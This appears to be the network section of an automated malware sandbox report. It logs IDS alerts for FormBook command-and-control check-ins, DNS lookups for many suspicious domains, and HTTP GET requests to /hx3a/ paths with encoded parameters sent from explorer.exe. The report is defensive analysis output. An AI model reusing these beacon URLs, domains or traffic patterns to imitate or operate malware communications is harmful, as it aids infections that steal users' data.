                                                                          04/12/21-10:02:41.467548ICMP384ICMP PING192.168.2.613.107.4.50
                                                                          04/12/21-10:02:45.479333ICMP384ICMP PING192.168.2.613.107.4.50
                                                                          04/12/21-10:02:49.467956ICMP384ICMP PING192.168.2.613.107.4.50
                                                                          04/12/21-10:02:53.468390ICMP384ICMP PING192.168.2.613.107.4.50
                                                                          04/12/21-10:02:57.468855ICMP384ICMP PING192.168.2.613.107.4.50
                                                                          04/12/21-10:03:01.469861ICMP384ICMP PING192.168.2.613.107.4.50
                                                                          04/12/21-10:03:05.494586ICMP384ICMP PING192.168.2.613.107.4.50
                                                                          04/12/21-10:03:09.469715ICMP384ICMP PING192.168.2.613.107.4.50
                                                                          04/12/21-10:03:09.505883ICMP408ICMP Echo Reply13.107.4.50192.168.2.6
                                                                          04/12/21-10:03:13.666887TCP1201ATTACK-RESPONSES 403 Forbidden804968923.227.38.74192.168.2.6
                                                                          04/12/21-10:03:40.456929TCP1201ATTACK-RESPONSES 403 Forbidden804969534.102.136.180192.168.2.6
                                                                          04/12/21-10:03:45.624225TCP2031453ET TROJAN FormBook CnC Checkin (GET)4969780192.168.2.634.102.136.180
                                                                          04/12/21-10:03:45.624225TCP2031449ET TROJAN FormBook CnC Checkin (GET)4969780192.168.2.634.102.136.180
                                                                          04/12/21-10:03:45.624225TCP2031412ET TROJAN FormBook CnC Checkin (GET)4969780192.168.2.634.102.136.180
                                                                          04/12/21-10:03:45.825259TCP1201ATTACK-RESPONSES 403 Forbidden804969734.102.136.180192.168.2.6
                                                                          04/12/21-10:04:19.335301TCP1201ATTACK-RESPONSES 403 Forbidden804970834.102.136.180192.168.2.6
                                                                          04/12/21-10:04:24.554411TCP1201ATTACK-RESPONSES 403 Forbidden8049709104.21.37.16192.168.2.6
                                                                          04/12/21-10:04:35.690279TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971380192.168.2.6172.67.210.123
                                                                          04/12/21-10:04:35.690279TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971380192.168.2.6172.67.210.123
                                                                          04/12/21-10:04:35.690279TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971380192.168.2.6172.67.210.123

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Apr 12, 2021 10:03:13.457211971 CEST4968980192.168.2.623.227.38.74
                                                                          Apr 12, 2021 10:03:13.498219967 CEST804968923.227.38.74192.168.2.6
                                                                          Apr 12, 2021 10:03:13.498514891 CEST4968980192.168.2.623.227.38.74
                                                                          Apr 12, 2021 10:03:13.498548985 CEST4968980192.168.2.623.227.38.74
                                                                          Apr 12, 2021 10:03:13.540777922 CEST804968923.227.38.74192.168.2.6
                                                                          Apr 12, 2021 10:03:13.666887045 CEST804968923.227.38.74192.168.2.6
                                                                          Apr 12, 2021 10:03:13.666924000 CEST804968923.227.38.74192.168.2.6
                                                                          Apr 12, 2021 10:03:13.666949034 CEST804968923.227.38.74192.168.2.6
                                                                          Apr 12, 2021 10:03:13.666973114 CEST804968923.227.38.74192.168.2.6
                                                                          Apr 12, 2021 10:03:13.666991949 CEST804968923.227.38.74192.168.2.6
                                                                          Apr 12, 2021 10:03:13.667007923 CEST804968923.227.38.74192.168.2.6
                                                                          Apr 12, 2021 10:03:13.667211056 CEST4968980192.168.2.623.227.38.74
                                                                          Apr 12, 2021 10:03:13.667242050 CEST4968980192.168.2.623.227.38.74
                                                                          Apr 12, 2021 10:03:24.642961979 CEST4969280192.168.2.6107.180.50.167
                                                                          Apr 12, 2021 10:03:24.777671099 CEST8049692107.180.50.167192.168.2.6
                                                                          Apr 12, 2021 10:03:24.777769089 CEST4969280192.168.2.6107.180.50.167
                                                                          Apr 12, 2021 10:03:24.777910948 CEST4969280192.168.2.6107.180.50.167
                                                                          Apr 12, 2021 10:03:24.912236929 CEST8049692107.180.50.167192.168.2.6
                                                                          Apr 12, 2021 10:03:24.929091930 CEST8049692107.180.50.167192.168.2.6
                                                                          Apr 12, 2021 10:03:24.929121971 CEST8049692107.180.50.167192.168.2.6
                                                                          Apr 12, 2021 10:03:24.929411888 CEST4969280192.168.2.6107.180.50.167
                                                                          Apr 12, 2021 10:03:24.929435015 CEST4969280192.168.2.6107.180.50.167
                                                                          Apr 12, 2021 10:03:25.063781023 CEST8049692107.180.50.167192.168.2.6
                                                                          Apr 12, 2021 10:03:40.213458061 CEST4969580192.168.2.634.102.136.180
                                                                          Apr 12, 2021 10:03:40.254520893 CEST804969534.102.136.180192.168.2.6
                                                                          Apr 12, 2021 10:03:40.254658937 CEST4969580192.168.2.634.102.136.180
                                                                          Apr 12, 2021 10:03:40.254791975 CEST4969580192.168.2.634.102.136.180
                                                                          Apr 12, 2021 10:03:40.295903921 CEST804969534.102.136.180192.168.2.6
                                                                          Apr 12, 2021 10:03:40.456928968 CEST804969534.102.136.180192.168.2.6
                                                                          Apr 12, 2021 10:03:40.456979036 CEST804969534.102.136.180192.168.2.6
                                                                          Apr 12, 2021 10:03:40.457360029 CEST4969580192.168.2.634.102.136.180
                                                                          Apr 12, 2021 10:03:40.457509995 CEST4969580192.168.2.634.102.136.180
                                                                          Apr 12, 2021 10:03:40.499985933 CEST804969534.102.136.180192.168.2.6
                                                                          Apr 12, 2021 10:03:45.582843065 CEST4969780192.168.2.634.102.136.180
                                                                          Apr 12, 2021 10:03:45.623852968 CEST804969734.102.136.180192.168.2.6
                                                                          Apr 12, 2021 10:03:45.624111891 CEST4969780192.168.2.634.102.136.180
                                                                          Apr 12, 2021 10:03:45.624224901 CEST4969780192.168.2.634.102.136.180
                                                                          Apr 12, 2021 10:03:45.665019989 CEST804969734.102.136.180192.168.2.6
                                                                          Apr 12, 2021 10:03:45.825258970 CEST804969734.102.136.180192.168.2.6
                                                                          Apr 12, 2021 10:03:45.825287104 CEST804969734.102.136.180192.168.2.6
                                                                          Apr 12, 2021 10:03:45.825581074 CEST4969780192.168.2.634.102.136.180
                                                                          Apr 12, 2021 10:03:45.825613976 CEST4969780192.168.2.634.102.136.180
                                                                          Apr 12, 2021 10:03:45.866179943 CEST804969734.102.136.180192.168.2.6
                                                                          Apr 12, 2021 10:03:51.404807091 CEST4969880192.168.2.6103.86.176.10
                                                                          Apr 12, 2021 10:03:51.573641062 CEST8049698103.86.176.10192.168.2.6
                                                                          Apr 12, 2021 10:03:51.573729992 CEST4969880192.168.2.6103.86.176.10
                                                                          Apr 12, 2021 10:03:51.573878050 CEST4969880192.168.2.6103.86.176.10
                                                                          Apr 12, 2021 10:03:51.744096041 CEST8049698103.86.176.10192.168.2.6
                                                                          Apr 12, 2021 10:03:51.744266987 CEST4969880192.168.2.6103.86.176.10
                                                                          Apr 12, 2021 10:03:51.744302988 CEST4969880192.168.2.6103.86.176.10
                                                                          Apr 12, 2021 10:03:51.913364887 CEST8049698103.86.176.10192.168.2.6
                                                                          Apr 12, 2021 10:03:57.076699018 CEST4970280192.168.2.6163.44.185.226
                                                                          Apr 12, 2021 10:03:57.387130022 CEST8049702163.44.185.226192.168.2.6
                                                                          Apr 12, 2021 10:03:57.387376070 CEST4970280192.168.2.6163.44.185.226
                                                                          Apr 12, 2021 10:03:57.387516975 CEST4970280192.168.2.6163.44.185.226
                                                                          Apr 12, 2021 10:03:57.696130037 CEST8049702163.44.185.226192.168.2.6
                                                                          Apr 12, 2021 10:03:57.865974903 CEST8049702163.44.185.226192.168.2.6
                                                                          Apr 12, 2021 10:03:57.866008997 CEST8049702163.44.185.226192.168.2.6
                                                                          Apr 12, 2021 10:03:57.866246939 CEST4970280192.168.2.6163.44.185.226
                                                                          Apr 12, 2021 10:03:57.866301060 CEST4970280192.168.2.6163.44.185.226
                                                                          Apr 12, 2021 10:03:58.174201965 CEST8049702163.44.185.226192.168.2.6
                                                                          Apr 12, 2021 10:04:03.047792912 CEST4970380192.168.2.691.236.136.12
                                                                          Apr 12, 2021 10:04:03.142784119 CEST804970391.236.136.12192.168.2.6
                                                                          Apr 12, 2021 10:04:03.142942905 CEST4970380192.168.2.691.236.136.12
                                                                          Apr 12, 2021 10:04:03.143248081 CEST4970380192.168.2.691.236.136.12
                                                                          Apr 12, 2021 10:04:03.238464117 CEST804970391.236.136.12192.168.2.6
                                                                          Apr 12, 2021 10:04:03.245630026 CEST804970391.236.136.12192.168.2.6
                                                                          Apr 12, 2021 10:04:03.245661974 CEST804970391.236.136.12192.168.2.6
                                                                          Apr 12, 2021 10:04:03.245970964 CEST4970380192.168.2.691.236.136.12
                                                                          Apr 12, 2021 10:04:03.246005058 CEST4970380192.168.2.691.236.136.12
                                                                          Apr 12, 2021 10:04:03.341068983 CEST804970391.236.136.12192.168.2.6
                                                                          Apr 12, 2021 10:04:13.748326063 CEST4970680192.168.2.681.17.18.198
                                                                          Apr 12, 2021 10:04:13.800884962 CEST804970681.17.18.198192.168.2.6
                                                                          Apr 12, 2021 10:04:13.810499907 CEST4970680192.168.2.681.17.18.198
                                                                          Apr 12, 2021 10:04:13.810667038 CEST4970680192.168.2.681.17.18.198
                                                                          Apr 12, 2021 10:04:13.860965967 CEST804970681.17.18.198192.168.2.6
                                                                          Apr 12, 2021 10:04:13.872195959 CEST804970681.17.18.198192.168.2.6
                                                                          Apr 12, 2021 10:04:13.872419119 CEST804970681.17.18.198192.168.2.6
                                                                          Apr 12, 2021 10:04:13.874372005 CEST4970680192.168.2.681.17.18.198
                                                                          Apr 12, 2021 10:04:13.877935886 CEST4970680192.168.2.681.17.18.198
                                                                          Apr 12, 2021 10:04:13.928219080 CEST804970681.17.18.198192.168.2.6
                                                                          Apr 12, 2021 10:04:19.091475010 CEST4970880192.168.2.634.102.136.180
                                                                          Apr 12, 2021 10:04:19.132606030 CEST804970834.102.136.180192.168.2.6
                                                                          Apr 12, 2021 10:04:19.132802010 CEST4970880192.168.2.634.102.136.180
                                                                          Apr 12, 2021 10:04:19.133089066 CEST4970880192.168.2.634.102.136.180
                                                                          Apr 12, 2021 10:04:19.174834013 CEST804970834.102.136.180192.168.2.6
                                                                          Apr 12, 2021 10:04:19.335300922 CEST804970834.102.136.180192.168.2.6
                                                                          Apr 12, 2021 10:04:19.335339069 CEST804970834.102.136.180192.168.2.6
                                                                          Apr 12, 2021 10:04:19.335534096 CEST4970880192.168.2.634.102.136.180
                                                                          Apr 12, 2021 10:04:19.335611105 CEST4970880192.168.2.634.102.136.180
                                                                          Apr 12, 2021 10:04:19.376581907 CEST804970834.102.136.180192.168.2.6
                                                                          Apr 12, 2021 10:04:24.419045925 CEST4970980192.168.2.6104.21.37.16
                                                                          Apr 12, 2021 10:04:24.469938040 CEST8049709104.21.37.16192.168.2.6
                                                                          Apr 12, 2021 10:04:24.470082998 CEST4970980192.168.2.6104.21.37.16
                                                                          Apr 12, 2021 10:04:24.470243931 CEST4970980192.168.2.6104.21.37.16
                                                                          Apr 12, 2021 10:04:24.521033049 CEST8049709104.21.37.16192.168.2.6
                                                                          Apr 12, 2021 10:04:24.554410934 CEST8049709104.21.37.16192.168.2.6
                                                                          Apr 12, 2021 10:04:24.554733038 CEST8049709104.21.37.16192.168.2.6
                                                                          Apr 12, 2021 10:04:24.554841995 CEST4970980192.168.2.6104.21.37.16
                                                                          Apr 12, 2021 10:04:24.554903984 CEST4970980192.168.2.6104.21.37.16

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Apr 12, 2021 10:02:21.780181885 CEST5215753192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:02:21.839986086 CEST53521578.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:02:33.021498919 CEST6118253192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:02:33.070437908 CEST53611828.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:02:34.735806942 CEST5567353192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:02:34.784600973 CEST53556738.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:02:42.476583004 CEST5777353192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:02:42.525346041 CEST53577738.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:03:07.940860987 CEST5998653192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:03:07.999838114 CEST53599868.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:03:13.364851952 CEST5247853192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:03:13.450625896 CEST53524788.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:03:14.786128044 CEST5893153192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:03:14.848254919 CEST53589318.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:03:22.030932903 CEST5772553192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:03:22.096566916 CEST53577258.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:03:24.554897070 CEST4928353192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:03:24.641757011 CEST53492838.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:03:26.332339048 CEST5837753192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:03:26.381004095 CEST53583778.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:03:27.400533915 CEST5507453192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:03:27.449434042 CEST53550748.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:03:29.967403889 CEST5451353192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:03:30.033349037 CEST53545138.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:03:35.054384947 CEST6204453192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:03:35.141187906 CEST53620448.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:03:40.151796103 CEST6379153192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:03:40.211898088 CEST53637918.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:03:40.267575026 CEST6426753192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:03:40.324932098 CEST53642678.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:03:45.501652002 CEST4944853192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:03:45.581566095 CEST53494488.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:03:50.837245941 CEST6034253192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:03:51.403454065 CEST53603428.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:03:54.021549940 CEST6134653192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:03:54.110476017 CEST53613468.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:03:56.760005951 CEST5177453192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:03:57.075501919 CEST53517748.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:02.909727097 CEST5602353192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:03.046571970 CEST53560238.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:08.279654980 CEST5838453192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:08.596414089 CEST53583848.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:10.429367065 CEST6026153192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:10.482471943 CEST53602618.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:11.601286888 CEST5606153192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:11.650017023 CEST53560618.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:13.640791893 CEST5833653192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:13.731574059 CEST53583368.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:14.152781963 CEST5378153192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:14.201318026 CEST53537818.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:18.927165985 CEST5406453192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:19.089031935 CEST53540648.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:24.346843004 CEST5281153192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:24.415144920 CEST53528118.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:28.072017908 CEST5529953192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:28.123445034 CEST53552998.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:28.984147072 CEST6374553192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:29.032845974 CEST53637458.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:29.563364029 CEST5005553192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:29.938306093 CEST53500558.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:35.553415060 CEST6137453192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:35.634313107 CEST53613748.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:37.001802921 CEST5033953192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:37.050525904 CEST53503398.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:38.864094973 CEST6330753192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:38.912774086 CEST53633078.8.8.8192.168.2.6

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                          Apr 12, 2021 10:03:13.364851952 CEST192.168.2.68.8.8.80x766Standard query (0)www.recovatek.comA (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:03:24.554897070 CEST192.168.2.68.8.8.80x758bStandard query (0)www.alliedcds.comA (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:03:29.967403889 CEST192.168.2.68.8.8.80xb191Standard query (0)www.th0rgramm.comA (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:03:35.054384947 CEST192.168.2.68.8.8.80xdc2cStandard query (0)www.selectenergyservicestx.comA (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:03:40.151796103 CEST192.168.2.68.8.8.80xdcfbStandard query (0)www.investmentpartners.limitedA (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:03:45.501652002 CEST192.168.2.68.8.8.80xc0daStandard query (0)www.stacksyspro.netA (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:03:50.837245941 CEST192.168.2.68.8.8.80x9e13Standard query (0)www.aksharnewtown.comA (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:03:56.760005951 CEST192.168.2.68.8.8.80x1a9bStandard query (0)www.tonton-koubou.comA (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:04:02.909727097 CEST192.168.2.68.8.8.80x4345Standard query (0)www.formula-kuhni.comA (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:04:08.279654980 CEST192.168.2.68.8.8.80x2b90Standard query (0)www.rainbowsdepot.comA (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:04:13.640791893 CEST192.168.2.68.8.8.80x53a6Standard query (0)www.xn--ol-xia.comA (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:04:18.927165985 CEST192.168.2.68.8.8.80xf4e5Standard query (0)www.ugonget.comA (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:04:24.346843004 CEST192.168.2.68.8.8.80x89b6Standard query (0)www.jabberjawmobile.comA (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:04:29.563364029 CEST192.168.2.68.8.8.80xf6b7Standard query (0)www.yakudatsu-hikaku.comA (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:04:35.553415060 CEST192.168.2.68.8.8.80xcd77Standard query (0)www.stkify.comA (IP address)IN (0x0001)

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                          Apr 12, 2021 10:03:13.450625896 CEST8.8.8.8192.168.2.60x766No error (0)www.recovatek.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                          Apr 12, 2021 10:03:13.450625896 CEST8.8.8.8192.168.2.60x766No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:03:24.641757011 CEST8.8.8.8192.168.2.60x758bNo error (0)www.alliedcds.comalliedcds.comCNAME (Canonical name)IN (0x0001)
                                                                          Apr 12, 2021 10:03:24.641757011 CEST8.8.8.8192.168.2.60x758bNo error (0)alliedcds.com107.180.50.167A (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:03:30.033349037 CEST8.8.8.8192.168.2.60xb191Name error (3)www.th0rgramm.comnonenoneA (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:03:35.141187906 CEST8.8.8.8192.168.2.60xdc2cName error (3)www.selectenergyservicestx.comnonenoneA (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:03:40.211898088 CEST8.8.8.8192.168.2.60xdcfbNo error (0)www.investmentpartners.limitedinvestmentpartners.limitedCNAME (Canonical name)IN (0x0001)
                                                                          Apr 12, 2021 10:03:40.211898088 CEST8.8.8.8192.168.2.60xdcfbNo error (0)investmentpartners.limited34.102.136.180A (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:03:45.581566095 CEST8.8.8.8192.168.2.60xc0daNo error (0)www.stacksyspro.netstacksyspro.netCNAME (Canonical name)IN (0x0001)
                                                                          Apr 12, 2021 10:03:45.581566095 CEST8.8.8.8192.168.2.60xc0daNo error (0)stacksyspro.net34.102.136.180A (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:03:51.403454065 CEST8.8.8.8192.168.2.60x9e13No error (0)www.aksharnewtown.comaksharnewtown.comCNAME (Canonical name)IN (0x0001)
                                                                          Apr 12, 2021 10:03:51.403454065 CEST8.8.8.8192.168.2.60x9e13No error (0)aksharnewtown.com103.86.176.10A (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:03:57.075501919 CEST8.8.8.8192.168.2.60x1a9bNo error (0)www.tonton-koubou.com163.44.185.226A (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:04:03.046571970 CEST8.8.8.8192.168.2.60x4345No error (0)www.formula-kuhni.com91.236.136.12A (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:04:08.596414089 CEST8.8.8.8192.168.2.60x2b90Server failure (2)www.rainbowsdepot.comnonenoneA (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:04:13.731574059 CEST8.8.8.8192.168.2.60x53a6No error (0)www.xn--ol-xia.com81.17.18.198A (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:04:19.089031935 CEST8.8.8.8192.168.2.60xf4e5No error (0)www.ugonget.comugonget.comCNAME (Canonical name)IN (0x0001)
                                                                          Apr 12, 2021 10:04:19.089031935 CEST8.8.8.8192.168.2.60xf4e5No error (0)ugonget.com34.102.136.180A (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:04:24.415144920 CEST8.8.8.8192.168.2.60x89b6No error (0)www.jabberjawmobile.com104.21.37.16A (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:04:24.415144920 CEST8.8.8.8192.168.2.60x89b6No error (0)www.jabberjawmobile.com172.67.202.107A (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:04:29.938306093 CEST8.8.8.8192.168.2.60xf6b7No error (0)www.yakudatsu-hikaku.com118.27.95.215A (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:04:35.634313107 CEST8.8.8.8192.168.2.60xcd77No error (0)www.stkify.com172.67.210.123A (IP address)IN (0x0001)
                                                                          Apr 12, 2021 10:04:35.634313107 CEST8.8.8.8192.168.2.60xcd77No error (0)www.stkify.com104.21.16.88A (IP address)IN (0x0001)

                                                                          HTTP Request Dependency Graph

                                                                          • www.recovatek.com
                                                                          • www.alliedcds.com
                                                                          • www.investmentpartners.limited
                                                                          • www.stacksyspro.net
                                                                          • www.aksharnewtown.com
                                                                          • www.tonton-koubou.com
                                                                          • www.formula-kuhni.com
                                                                          • www.xn--ol-xia.com
                                                                          • www.ugonget.com
                                                                          • www.jabberjawmobile.com
                                                                          • www.yakudatsu-hikaku.com

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.2.64968923.227.38.7480C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 12, 2021 10:03:13.498548985 CEST116OUTGET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=fCmUcBRhMrUy3w+kl11B/xiypSW2fUD8cU7Pu3gqArK5c3pJn3j9k/DsIYu7GSRGk0uMV4XXlw== HTTP/1.1
                                                                          Host: www.recovatek.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 12, 2021 10:03:13.666887045 CEST118INHTTP/1.1 403 Forbidden
                                                                          Date: Mon, 12 Apr 2021 08:03:13 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          X-Sorting-Hat-PodId: 159
                                                                          X-Sorting-Hat-ShopId: 46105591968
                                                                          X-Dc: gcp-us-central1
                                                                          X-Request-ID: 617efc6b-4c0c-427a-b865-bed9b6ff1703
                                                                          Set-Cookie: _shopify_fs=2021-04-12T08%3A03%3A13Z; Expires=Tue, 12-Apr-22 08:03:13 GMT; Domain=recovatek.com; Path=/; SameSite=Lax
                                                                          X-XSS-Protection: 1; mode=block
                                                                          X-Download-Options: noopen
                                                                          X-Content-Type-Options: nosniff
                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                          CF-Cache-Status: DYNAMIC
                                                                          cf-request-id: 0966b43bfd00002c0d67a45000000001
                                                                          Server: cloudflare
                                                                          CF-RAY: 63eaefd99e352c0d-FRA
                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                          Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73
                                                                          Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-s


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          1192.168.2.649692107.180.50.16780C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 12, 2021 10:03:24.777910948 CEST145OUTGET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=3BonITYdxMn0gLM+WELVYgnSp+qYa6n19HgYUH50ozUw04GLDm+bjpbdD44/kvkXlDtuAUMMsA== HTTP/1.1
                                                                          Host: www.alliedcds.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 12, 2021 10:03:24.929091930 CEST145INHTTP/1.1 302 Found
